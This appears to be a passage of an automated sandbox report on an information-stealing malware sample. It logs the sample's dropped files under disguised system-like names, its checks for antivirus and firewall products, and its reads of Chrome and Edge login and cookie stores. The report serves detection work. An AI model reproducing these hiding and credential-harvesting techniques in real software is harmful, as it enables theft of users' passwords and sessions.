                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe Queries volume information: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\Memory Compression.exe Queries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
                                    Source: C:\ChainbrowserNet\serverDll.exe Queries volume information: C:\ChainbrowserNet\serverDll.exe VolumeInformation
                                    Source: C:\Users\Default\Videos\System.exe Queries volume information: C:\Users\Default\Videos\System.exe VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Queries volume information: C:\ChainbrowserNet\backgroundTaskHost.exe VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A4DF1E
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3B146 GetVersionExW,0_2_00A3B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: serverDll.exe PID: 5300, type: MEMORYSTR
                                    Source: Yara matchFile source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED
                                    Source: Yara matchFile source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
